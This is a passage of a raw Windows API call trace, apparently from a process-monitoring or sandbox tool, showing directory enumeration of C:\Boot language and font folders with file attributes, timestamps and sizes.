lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.552] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.553] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0154.553] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.553] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.553] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US", lpFilePart=0x0) returned 0xd [0154.553] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\en-US\\", lpFilePart=0x0) returned 0xe [0154.553] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.553] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.553] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.554] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0154.554] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0154.554] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.554] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0154.554] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0154.554] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.555] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.555] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.555] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.555] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.556] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES", lpFilePart=0x0) returned 0xd [0154.556] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\", lpFilePart=0x0) returned 0xe [0154.556] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.556] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.556] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.556] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.556] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.556] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0154.557] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0154.557] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.557] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.557] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.557] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.557] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.557] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0154.557] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0154.557] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.558] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.558] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.558] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.558] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.558] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0154.558] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0154.558] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.559] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.559] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.560] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.560] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0154.560] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0154.560] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.560] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0154.561] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, 